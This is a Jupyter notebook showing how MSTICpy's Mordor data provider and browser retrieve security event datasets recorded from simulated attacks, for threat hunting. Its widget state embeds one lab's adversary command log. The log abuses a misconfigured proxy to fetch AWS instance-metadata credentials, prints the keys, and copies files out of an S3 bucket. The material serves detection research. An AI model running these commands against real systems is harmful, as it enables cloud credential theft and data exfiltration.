{ "cells": [ { "cell_type": "markdown", "metadata": {}, "source": [ "# MSTICpy - Mordor data provider and browser\n", "\n", "### Description\n", "This notebook provides a guided example of using the Mordor data provider and browser included with MSTICpy.\n", "\n", "For more information on the Mordor data sets see the [Open Threat Research Forge Mordor GitHub repo](https://github.com/OTRF/mordor)\n", "\n", "### Contents:\n", "- Using the Mordor data provider to retrieve data sets\n", " - Listing queries\n", " - Running a query to retrieve data\n", " - Optional parameters\n", " - Searching for queries by Mordor property\n", "- Mordor Browser\n" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Using the Data Provider to download datasets\n", "\n", "Using the data provider you can download and render event data as a pandas DataFrame.\n", "\n", "> **Note** - Mordor includes both host event data and network capture data.
\n", "> Although Capture files can be downloaded and unpacked
\n", "> they currently cannot be populated into a pandas DataFrame.\n", "> This is the case for most `network` datasets.
\n", "> `Host` event data is retrieved and populated into DataFrames.\n" ] }, { "cell_type": "code", "execution_count": 12, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Retrieving Mitre data...\n", "Retrieving Mordor data...\n" ] } ], "source": [ "from msticpy.data import QueryProvider\n", "mdr_data = QueryProvider(\"Mordor\")\n", "mdr_data.connect()" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "### List Queries\n", "\n", "> Note: Many Mordor data entries have multiple data sets, so we see more queries than Mordor entries.\n", "\n", "(Only first 15 shown)" ] }, { "cell_type": "code", "execution_count": 13, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "['small.aws.collection.ec2_proxy_s3_exfiltration',\n", " 'small.windows.collection.host.msf_record_mic',\n", " 'small.windows.credential_access.host.covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges',\n", " 'small.windows.credential_access.host.empire_dcsync_dcerpc_drsuapi_DsGetNCChanges',\n", " 'small.windows.credential_access.host.empire_mimikatz_backupkeys_dcerpc_smb_lsarpc',\n", " 'small.windows.credential_access.host.empire_mimikatz_extract_keys',\n", " 'small.windows.credential_access.host.empire_mimikatz_logonpasswords',\n", " 'small.windows.credential_access.host.empire_mimikatz_lsadump_patch',\n", " 'small.windows.credential_access.host.empire_mimikatz_sam_access',\n", " 'small.windows.credential_access.host.empire_over_pth_patch_lsass',\n", " 'small.windows.credential_access.host.empire_powerdump_sam_access',\n", " 'small.windows.credential_access.host.empire_shell_reg_dump_sam',\n", " 'small.windows.credential_access.host.empire_shell_rubeus_asktgt_createnetonly',\n", " 'small.windows.credential_access.host.empire_shell_rubeus_asktgt_ptt',\n", " 'small.windows.credential_access.host.rdp_interactive_taskmanager_lsass_dump']" ] }, "execution_count": 13, "metadata": {}, "output_type": "execute_result" } ], "source": [ "mdr_data.list_queries()[:15]" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "### Retrieving/querying a data set" ] }, { "cell_type": "code", "execution_count": 14, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges.zip\n", "Extracting covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges_2020-08-05020926.json\n" ] }, { "data": { "text/html": [ "
\n", "\n", "\n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", "
@versionKeywordsThreadIDVersionDestAddresshostLayerRTIDMessageSourceModuleNameSourceName...PropertiesOperationTypeQueryNameQueryResultsQueryStatusPipeNameDisabledPrivilegeListEnabledPrivilegeListShareLocalPathRelativeTargetName
01-921436483760003481648881239.255.255.250wec.internal.cloudapp.net44.0The Windows Filtering Platform has permitted a...eventlogMicrosoft-Windows-Security-Auditing...NaNNaNNaNNaNNaNNaNNaNNaNNaNNaN
11-922337203685477580844522NaNwec.internal.cloudapp.netNaNFile created:\\r\\nRuleName: -\\r\\nUtcTime: 2020-...eventlogMicrosoft-Windows-Sysmon...NaNNaNNaNNaNNaNNaNNaNNaNNaNNaN
21-922337203685477580844522NaNwec.internal.cloudapp.netNaNRawAccessRead detected:\\r\\nRuleName: -\\r\\nUtcT...eventlogMicrosoft-Windows-Sysmon...NaNNaNNaNNaNNaNNaNNaNNaNNaNNaN
\n", "

3 rows × 145 columns

\n", "
" ], "text/plain": [ " @version Keywords ThreadID Version DestAddress \\\n", "0 1 -9214364837600034816 4888 1 239.255.255.250 \n", "1 1 -9223372036854775808 4452 2 NaN \n", "2 1 -9223372036854775808 4452 2 NaN \n", "\n", " host LayerRTID \\\n", "0 wec.internal.cloudapp.net 44.0 \n", "1 wec.internal.cloudapp.net NaN \n", "2 wec.internal.cloudapp.net NaN \n", "\n", " Message SourceModuleName \\\n", "0 The Windows Filtering Platform has permitted a... eventlog \n", "1 File created:\\r\\nRuleName: -\\r\\nUtcTime: 2020-... eventlog \n", "2 RawAccessRead detected:\\r\\nRuleName: -\\r\\nUtcT... eventlog \n", "\n", " SourceName ... Properties OperationType \\\n", "0 Microsoft-Windows-Security-Auditing ... NaN NaN \n", "1 Microsoft-Windows-Sysmon ... NaN NaN \n", "2 Microsoft-Windows-Sysmon ... NaN NaN \n", "\n", " QueryName QueryResults QueryStatus PipeName DisabledPrivilegeList \\\n", "0 NaN NaN NaN NaN NaN \n", "1 NaN NaN NaN NaN NaN \n", "2 NaN NaN NaN NaN NaN \n", "\n", " EnabledPrivilegeList ShareLocalPath RelativeTargetName \n", "0 NaN NaN NaN \n", "1 NaN NaN NaN \n", "2 NaN NaN NaN \n", "\n", "[3 rows x 145 columns]" ] }, "execution_count": 14, "metadata": {}, "output_type": "execute_result" } ], "source": [ "mdr_data.small.windows.credential_access.host.covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges().head(3)" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "### Optional parameters\n", "\n", "The data provider and the query functions support some parameters to control\n", "aspects of the query operation.\n", "\n", "- **use_cached** : bool, optional
\n", " Try to use locally saved file first,\n", " by default True. If you’ve previously downloaded a file, it will use\n", " this rather than downloading a new copy.\n", "- **save_folder** : str, optional
\n", " Path to output folder, by default\n", " \".\". The path that downloaded and extracted files are saved to.\n", "- **silent** : bool
\n", " If True, suppress feedback. By default, False.\n", "\n", "If you specify these when you initialize the data provider, the settings\n", "will apply to all queries." ] }, { "cell_type": "code", "execution_count": 15, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Retrieving Mitre data...\n", "Retrieving Mordor data...\n" ] } ], "source": [ "mdr_data = QueryProvider(\"Mordor\", save_folder=\"./mordor\")\n", "mdr_data.connect()" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "Using these parameters in the query will override the provider settings\n", "and defaults for that query." ] }, { "cell_type": "code", "execution_count": 16, "metadata": {}, "outputs": [ { "data": { "text/html": [ "
\n", "\n", "\n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", "
@versionKeywordsThreadIDVersionDestAddresshostLayerRTIDMessageSourceModuleNameSourceName...PropertiesOperationTypeQueryNameQueryResultsQueryStatusPipeNameDisabledPrivilegeListEnabledPrivilegeListShareLocalPathRelativeTargetName
01-921436483760003481648881239.255.255.250wec.internal.cloudapp.net44.0The Windows Filtering Platform has permitted a...eventlogMicrosoft-Windows-Security-Auditing...NaNNaNNaNNaNNaNNaNNaNNaNNaNNaN
11-922337203685477580844522NaNwec.internal.cloudapp.netNaNFile created:\\r\\nRuleName: -\\r\\nUtcTime: 2020-...eventlogMicrosoft-Windows-Sysmon...NaNNaNNaNNaNNaNNaNNaNNaNNaNNaN
\n", "

2 rows × 145 columns

\n", "
" ], "text/plain": [ " @version Keywords ThreadID Version DestAddress \\\n", "0 1 -9214364837600034816 4888 1 239.255.255.250 \n", "1 1 -9223372036854775808 4452 2 NaN \n", "\n", " host LayerRTID \\\n", "0 wec.internal.cloudapp.net 44.0 \n", "1 wec.internal.cloudapp.net NaN \n", "\n", " Message SourceModuleName \\\n", "0 The Windows Filtering Platform has permitted a... eventlog \n", "1 File created:\\r\\nRuleName: -\\r\\nUtcTime: 2020-... eventlog \n", "\n", " SourceName ... Properties OperationType \\\n", "0 Microsoft-Windows-Security-Auditing ... NaN NaN \n", "1 Microsoft-Windows-Sysmon ... NaN NaN \n", "\n", " QueryName QueryResults QueryStatus PipeName DisabledPrivilegeList \\\n", "0 NaN NaN NaN NaN NaN \n", "1 NaN NaN NaN NaN NaN \n", "\n", " EnabledPrivilegeList ShareLocalPath RelativeTargetName \n", "0 NaN NaN NaN \n", "1 NaN NaN NaN \n", "\n", "[2 rows x 145 columns]" ] }, "execution_count": 16, "metadata": {}, "output_type": "execute_result" } ], "source": [ "mdr_data.small.windows.credential_access.host.covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges(silent=True, save_folder=\"./mordor\").head(2)" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Getting summary data about a query\n", "\n", "Call the query function with a single \"?\" parameter." ] }, { "cell_type": "code", "execution_count": 17, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Query: covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges\n", "Data source: Mordor\n", "Covenant DCSync\n", "\n", "Notes\n", "-----\n", "Mordor ID: SDWIN-200805020926\n", "This dataset represents adversaries abusing Active Directory Replication services to retrieve secret domain data (i.e. NTLM hashes) from domain accounts.\n", "\n", "Mitre Techniques: T1003: OS Credential Dumping\n", "Mitre Tactics: TA0006: Credential Access\n", "\n", "Parameters\n", "----------\n", "Query:\n", "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges.zip\n" ] } ], "source": [ "mdr_data.small.windows.credential_access.host.covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges(\"?\")" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "### Searching for Queries with QueryProvider.search_queries()\n", "Search queries for matching attributes.\n", "\n", "#### Parameters\n", "\n", "**search** : str Search string. \n", "\n", "Substrings separated by commas will be treated as OR terms - e.g. \"a, b\" == \"a\" or \"b\".
\n", "Substrings separated by \"+\" will be treated as AND terms - e.g. \"a + b\" == \"a\" and \"b\"\n", "\n", "#### Returns\n", "List of matching query names." ] }, { "cell_type": "code", "execution_count": 18, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "['small.aws.collection.ec2_proxy_s3_exfiltration (AWS Cloud Bank Breach S3)']" ] }, "execution_count": 18, "metadata": {}, "output_type": "execute_result" } ], "source": [ "mdr_data.search_queries(\"AWS\")" ] }, { "cell_type": "code", "execution_count": 19, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "['small.windows.defense_evasion.host.empire_powerview_ldap_ntsecuritydescriptor (Empire Powerview Add-DomainObjectAcl)',\n", " 'small.windows.defense_evasion.network.empire_powerview_ldap_ntsecuritydescriptor (Empire Powerview Add-DomainObjectAcl)']" ] }, "execution_count": 19, "metadata": {}, "output_type": "execute_result" } ], "source": [ "mdr_data.search_queries(\"Empire + T1222\")" ] }, { "cell_type": "code", "execution_count": 20, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "['small.windows.credential_access.host.empire_mimikatz_lsadump_patch (Empire Mimikatz Lsadump LSA Patch)',\n", " 'small.windows.credential_access.host.empire_dcsync_dcerpc_drsuapi_DsGetNCChanges (Empire DCSync)',\n", " 'small.windows.credential_access.network.empire_dcsync_dcerpc_drsuapi_DsGetNCChanges (Empire DCSync)',\n", " 'small.windows.defense_evasion.host.empire_wdigest_downgrade.tar (Empire WDigest Downgrade)',\n", " 'small.windows.credential_access.host.empire_mimikatz_sam_access (Empire Mimikatz SAM Extract Hashes)',\n", " 'small.windows.credential_access.host.empire_mimikatz_logonpasswords (Empire Mimikatz LogonPasswords)']" ] }, "execution_count": 20, "metadata": {}, "output_type": "execute_result" } ], "source": [ "mdr_data.search_queries(\"Empire + Credential\")" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Mordor Browser\n", "\n", "We've also built a more specialized browser for Mordor data. This uses the metadata in the repository to let you view full details of the dataset.\n", "\n", "You can also preview the dataset (if it is convertible to a DataFrame).\n", "\n", "For details of the data shown please see the [Mordor GitHub repo](https://github.com/OTRF/mordor)
and the [Threat Hunter Playbook](https://threathunterplaybook.com/introduction.html)\n" ] }, { "cell_type": "code", "execution_count": 21, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Retrieving Mitre data...\n", "Retrieving Mordor data...\n" ] }, { "data": { "application/vnd.jupyter.widget-view+json": { "model_id": "8b1088fa20be4f0fafa3e8d3c549e60d", "version_major": 2, "version_minor": 0 }, "text/plain": [ "VBox(children=(VBox(children=(HTML(value='

Mordor dataset browser

'), Select(description='Data sets', l…" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "text/html": [ "

" ], "text/plain": [ "" ] }, "metadata": {}, "output_type": "display_data" } ], "source": [ "from msticpy.data.browsers.mordor_browser import MordorBrowser\n", "\n", "mdr_browser = MordorBrowser()" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "### Mordor Browser Details\n", "The top scrollable list is a list of the Mordor datasets. Selecting one of these updates the data in the lower half of the browser.\n", "\n", "#### Filter Drop-down\n", "To narrow your search you can filter using a text search or filter by Mitre Attack Techniques or Tactics.\n", "- The Filter text box uses the same syntax as the provider `search_queries()` function.\n", " - Simple text string will find matches for datasets that contain this string\n", " - Strings separated by \",\" are treated as OR terms - i.e. it will match items that contain ANY of the substrings\n", " - Strings separated by \"+\" are treated as AND terms - i.e. it will match items that contain ALL of the substrings\n", "- The Mitre Techniques and Tactics lists are multi-select lists. Only items that have techniques and tactics matching\n", " the selected items will be show.\n", "- Reset Filter button will clear any filtering.\n", "\n", "#### Main Details Window\n", "- title, ID, author, creation date, modification date and description are self-explanatory.\n", "- tags can be used for searching\n", "- file_paths (see below)\n", "- attacks - lists related Mitre Technique and Tactics. The item title is a link to the Mitre page describing the technique or tactic.\n", "- notebooks - if there is a notebook in the Threat Hunter Playbook site, a link to it is shown here. (multiple notebooks might be shown)\n", "- simulation - raw data listing the steps in the attack (and useful for replaying the attack in a demo environment).\n", "- references - links to any external data about the attack.\n", "\n", "#### File_paths\n", "This section allows you to select, download and (in most cases) display the event data relating to the attack.\n", "\n", "Select a file and click on the Download button.\n", "\n", "The zipped file is downloaded and extracted. If it is event data, this is converted to a\n", "pandas DataFrame and displayed below the rest of the data.\n", "\n", "The current dataset is available as an attribute of the browser:\n", "```\n", " mdr_browser.current_dataset\n", "```\n", "\n", "Datasets that you've downloaded and displayed in this session are also cached in the browser and available in the \n", "`mdr_browser.datasets` attribute.\n", "\n", "#### Downloaded files\n", "By default files are downloaded and extracted to the current folder. You can change this with the\n", "`save_folder` parameter when creating the `MordorBrowser` object.\n", "\n", "You can also specify the `use_cached` parameter. By default, this is `True`, which causes downloaded files not\n", "to be deleted after extraction. These local copies are used if you try to view the same data set again.\n", "This also works across sessions.\n", "\n", "If `use_cache` is set to False, files are deleted immediately after downloading, extracting and populating the\n", "DataFrame." ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "### Using the standard query browser\n", "\n", "> **Note** - In the `Example` section, ignore the examples of parameters
\n", "> passed to the query - these are not needed and ignored." ] }, { "cell_type": "code", "execution_count": 22, "metadata": {}, "outputs": [ { "data": { "application/vnd.jupyter.widget-view+json": { "model_id": "054b2f33184f4d5c8daa3456cbf25a60", "version_major": 2, "version_minor": 0 }, "text/plain": [ "VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle(description_width='initial')), Sel…" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "text/html": [ "

" ], "text/plain": [ "" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "text/html": [ "

AWS Cloud Bank Breach S3

Notes
Mordor ID: SDAWS-200914011940
This dataset represents adversaries abusing a misconfigured EC2 reverse proxy to obtain instance profile keys and eventually exfiltrate files from an S3 bucket.
Mitre Techniques: T1078: Valid Accounts, T1530: Data from Cloud Storage Object
Mitre Tactics: TA0001: Initial Access, TA0003: Persistence, TA0004: Privilege Escalation, TA0005: Defense Evasion, TA0009: Collection

Parameters


Query

https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/aw\n",
       "  s/collection/ec2_proxy_s3_exfiltration.zip

\n", "

Example

\n", "

{QueryProvider}[.QueryPath].QueryName(params...)

\n", " 
qry_prov.small.aws.collection.ec2_proxy_s3_exfiltration(start=start, end=end, hostname=host)
\n", " " ], "text/plain": [ "" ] }, "metadata": {}, "output_type": "display_data" } ], "source": [ "mdr_data.browse_queries()" ] } ], "metadata": { "kernelspec": { "display_name": "Python (condadev)", "language": "python", "name": "condadev" }, "language_info": { "codemirror_mode": { "name": "ipython", "version": 3 }, "file_extension": ".py", "mimetype": "text/x-python", "name": "python", "nbconvert_exporter": "python", "pygments_lexer": "ipython3", "version": "3.6.10" }, "widgets": { "application/vnd.jupyter.widget-state+json": { "state": { "0085351ab1274adb84fff8e15f00ef7e": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "00f39a99d801432386985bbba8d91d3e": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_2905573e95634a98bf96b21701a539ba", "IPY_MODEL_3e641eadea214ac9942ed005f61f2c5e" ], "layout": "IPY_MODEL_7df2c107b2bb486c8e6d84d634323c3f" } }, "0164b6d653774f3d811cea200de21cb2": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "Filter:", "layout": "IPY_MODEL_ac32c7cca9c24c7988f0eb4e9197d5b4", "style": "IPY_MODEL_c5b9df9c55be4d75a6c3d956607abcec" } }, "0329d23fb8c84bb3944067c8c0952111": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "0513f34232dc4d66bdec18a819a65bc7": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "054b2f33184f4d5c8daa3456cbf25a60": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_3aeb90923fc448b9ad408592840224dc", "IPY_MODEL_707792065e3b43c3910a84efa28ab8ce" ], "layout": "IPY_MODEL_5e9884fbe358493aacea24c82b103c61" } }, "0561b3a93c5443f6a4f359f17851beab": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextareaModel", "state": { "description": "simulation", "layout": "IPY_MODEL_257a823eb6f24fc79a12f02010dd47c3", "style": "IPY_MODEL_8cc83098baec4f78b1a4d91266c32802", "value": "{'adversary_view': '> curl -s '\n 'http://35.174.154.220/latest/meta-data/iam/security-credentials/ '\n '-H '\n '\"Host:169.254.169.254\" \\n'\n 'MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0 '\n '>\\n'\n '\\n'\n '> curl -s '\n 'http://35.174.154.220/latest/meta-data/iam/security-credentials/MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0 '\n '-H \"Host:169.254.169.254\"\\n'\n '{\\n'\n '\"Code\" : \"Success\",\\n'\n '\"LastUpdated\" : \"2020-09-14T00:49:26Z\",\\n'\n '\"Type\" : \"AWS-HMAC\",\\n'\n '\"AccessKeyId\" : \"ASIA5FLZVX4OPVKKVBMX\",\\n'\n '\"SecretAccessKey\" : '\n '\"aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03\",\\n'\n '\"Token\" : \"TOKEN\",\\n'\n '\"Expiration\" : \"2020-09-14T07:10:27Z\"\\n'\n '}\\n'\n '\\n'\n '> aws configure --profile erratic\\n'\n 'AWS Access Key ID [None]: ASIA5FLZVX4OPVKKVBMX\\n'\n 'AWS Secret Access Key [None]: '\n 'aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03\\n'\n 'Default region name [None]: us-east-1\\n'\n 'Default output format [None]: json\\n'\n '\\n'\n '> echo aws_session_token = \"TOKEN\" >> ~/.aws/credentials \\n'\n '\\n'\n '> aws s3 ls --profile erratic\\n'\n '2020-09-13 20:00:32 '\n 'mordorctstack-s3bucketforcloudtrail-1gj7vvt2ul642\\n'\n '2020-09-13 19:59:59 mordors3stack-s3bucket-llp2yingx64a\\n'\n '\\n'\n '> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile '\n 'erratic\\n'\n '2020-09-13 20:00:26 89 ring.txt\\n'\n '\\n'\n '> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile '\n 'erratic\\n'\n '2020-09-13 20:00:26 89 ring.txt\\n'\n '\\n'\n '> aws s3 sync s3://mordors3stack-s3bucket-llp2yingx64a . '\n '--profile erratic \\n'\n 'download: '\n 's3://mordors3stack-s3bucket-llp2yingx64a/ring.txt to '\n './ring.txt',\n 'environment': 'https://github.com/OTRF/mordor-labs/tree/master/environments/aws/cloud-breach-s3',\n 'permissions_required': ['user'],\n 'tools': [{'module': 'Exfiltration',\n 'name': 'AWS CLI',\n 'script': 'https://github.com/OTRF/mordor-labs/tree/master/environments/aws/cloud-breach-s3',\n 'type': 'Cloud Formation Templates'}]}" } }, "07c0118cae4f47a99b130e95d32b2186": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "0bd9762ed7f3469d942d65cdeaf93892": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "id", "layout": "IPY_MODEL_647f49b51caa47a7acc4adf675dfd47b", "style": "IPY_MODEL_b7af59b013a34a0cbb9d1fdc408fbbfc", "value": "SDAWS-200914011940" } }, "0d2d30c344e74b6283f5d1461287d534": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "0f1ea964da4d4419bfc7841800cb8e33": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_1f357d31eebd4172b65e9acbe9e5d38d", "IPY_MODEL_7aedafe1ed574aecaabec6d4f61416da" ], "layout": "IPY_MODEL_e8e31268a7df4c6088f138fc0a387cfa" } }, "12cfb0e793da4862855e96a851dabd07": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "SelectModel", "state": { "_options_labels": [ "SDAWS-200914011940 AWS Cloud Bank Breach S3 (AWS)", "SDWIN-190301125905 Empire Powerview Add-DomainObjectAcl (Windows)", "SDWIN-190301174830 Empire DCSync (Windows)", "SDWIN-190319020147 Empire Net Local Administrators Group (Windows)", "SDWIN-190319020729 Empire Net Local Users (Windows)", "SDWIN-190319021158 Empire Net Domain Users (Windows)", "SDWIN-190319023812 Empire Userland Registry Run Keys (Windows)", "SDWIN-190319024742 Empire Userland Scheduled Tasks (Windows)", "SDWIN-190319131123 Empire Over-Pass-The-Hash (Windows)", "SDWIN-190319145126 Rubeus Userland ASKTGT PTT (Windows)", "SDWIN-190403133337 IKEEXT Remote Service DLL Hijack (Windows)", "SDWIN-190518182022 Empire VBS Execution (Windows)", "SDWIN-190518184306 Empire Elevated WMI Eventing (Windows)", "SDWIN-190518200432 Empire PSInject (Windows)", "SDWIN-190518201207 Empire Shell Net Domain Admins (Windows)", "SDWIN-190518201922 Empire WDigest Downgrade (Windows)", "SDWIN-190518202151 Empire Mimikatz LogonPasswords (Windows)", "SDWIN-190518203650 Empire Enable RDP (Windows)", "SDWIN-190518210125 Empire Invoke SMBExec (Windows)", "SDWIN-190518210652 Empire Invoke PsExec (Windows)", "SDWIN-190518211052 Empire Invoke DCOM ShellWindows (Windows)", "SDWIN-190518211456 Empire Invoke PSRemoting (Windows)", "SDWIN-190518213907 Empire Invoke Execute MSBuild (Windows)", "SDWIN-190518221344 Empire Invoke DLLInjection (Windows)", "SDWIN-190518224039 Empire Find Local Admin Access (Windows)", "SDWIN-190518230752 Empire Mimikatz Extract Kerberos Keys (Windows)", "SDWIN-190518235535 Empire Mimikatz Backup Keys (Windows)", "SDWIN-190519005224 Empire Remote Get Session (Windows)", "SDWIN-190625103712 Empire Mimikatz SAM Extract Hashes (Windows)", "SDWIN-190625133822 Empire Reg Dump SAM Hive (Windows)", "SDWIN-191027055035 RDP TaskManager LSASS Dump (Windows)", "SDWIN-191027223020 Covenant ShellCmd InstallUtil (Windows)", "SDWIN-191225045202 Empire Invoke InternalMonologue (Windows)", "SDWIN-200609225055 MSF Record Mic (Windows)", "SDWIN-200721232741 Empire Regsvr32 Execution (Windows)", "SDWIN-200722001847 Empire Elevated Registry Run Keys (Windows)", "SDWIN-200724174200 Covenant Remote WMI Eventing ActiveScriptEventConsumers (Windows)", "SDWIN-200805020926 Covenant DCSync (Windows)", "SDWIN-200805034820 Covenant SC.exe Utility Query (Windows)", "SDWIN-200806012009 Covenant SharpSC Query (Windows)", "SDWIN-200806015757 Covenant Remote File Copy (Windows)", "SDWIN-200806022635 Covenant SharpSC Create (Windows)", "SDWIN-200806030120 Covenant SharpSC Start (Windows)", "SDWIN-200806031938 Covenant SharpSC Stop Service (Windows)", "SDWIN-200806035621 Covenant SharpWMI Exec (Windows)", "SDWIN-200806115603 Covenant PowerShell Remoting Command (Windows)", "SDWIN-200806130039 Covenant GetDomainGroup Domain Admins (Windows)", "SDWIN-200807103913 Empire Mimikatz Lsadump LSA Patch (Windows)", "SDWIN-200904032946 Invoke BypassUAC FodHelper (Windows)", "SDWIN-200914080546 Empire Remote WMIC Add User (Windows)", "SDWIN-200916232559 Mimikatz Netlogon Unauthenticated NetrServerAuthenticate2 (Windows)", "SDWIN-200917174542 DCOM ExecuteExcel4macro (Windows)", "SDWIN-200918145959 DCOM RegisterXLL (Windows)", "SDWIN-200921001437 Empire Invoke WMI (Windows)", "SDWIN-200921175806 Empire Elevated Scheduled Tasks (Windows)", "SDWIN-200921230246 Rubeus Elevated ASKTGT CreateNetOnly (Windows)", "SDWIN-200922042230 Empire Powerdump Extract Hashes (Windows)" ], "description": "Data sets", "index": 0, "layout": "IPY_MODEL_647f49b51caa47a7acc4adf675dfd47b", "style": "IPY_MODEL_373a0836c6cd467892043018c97957d3" } }, "12e3d4e2e2674a5d83a848bbf1795250": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "creation_date", "layout": "IPY_MODEL_647f49b51caa47a7acc4adf675dfd47b", "style": "IPY_MODEL_2d186d5ba3304f2baf9b07e8cb9f40f3", "value": "2020-09-13 00:00:00" } }, "1488d6fdd10e48d28c73b4873e114b14": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HTMLModel", "state": { "layout": "IPY_MODEL_a70689f896f74f2daf29e27a2b041f1a", "style": "IPY_MODEL_35454e40c4274824bef1570224e38d97", "value": "

Mordor dataset browser

" } }, "15544c32789444f2a5c22624ef1c1a36": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "15cc7e4d39db4d30ad623825612f9cff": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "18b2b22895544665831e6b9e2448d268": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "SelectMultipleModel", "state": { "_options_labels": [ "T1078 - Valid Accounts", "T1530 - Data from Cloud Storage Object", "T1222 - File and Directory Permissions Modification", "T1003 - OS Credential Dumping", "T1069 - Permission Groups Discovery", "T1087 - Account Discovery", "T1547 - Boot or Logon Autostart Execution", "T1053 - Scheduled Task/Job", "T1550 - Use Alternate Authentication Material", "T1574 - Hijack Execution Flow", "T1059 - Command and Scripting Interpreter", "T1546 - Event Triggered Execution", "T1055 - Process Injection", "T1112 - Modify Registry", "T1021 - Remote Services", "T1047 - Windows Management Instrumentation", "T1049 - System Network Connections Discovery", "T1218 - Signed Binary Proxy Execution", "T1123 - Audio Capture", "T1548 - Abuse Elevation Control Mechanism", "T1210 - Exploitation of Remote Services" ], "description": "Mitre Techniques", "index": [ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20 ], "layout": "IPY_MODEL_1c1c043edd1b412fbc11a3c03575b586", "rows": 5, "style": "IPY_MODEL_f564cc6a7335491eb7f12015ae752752" } }, 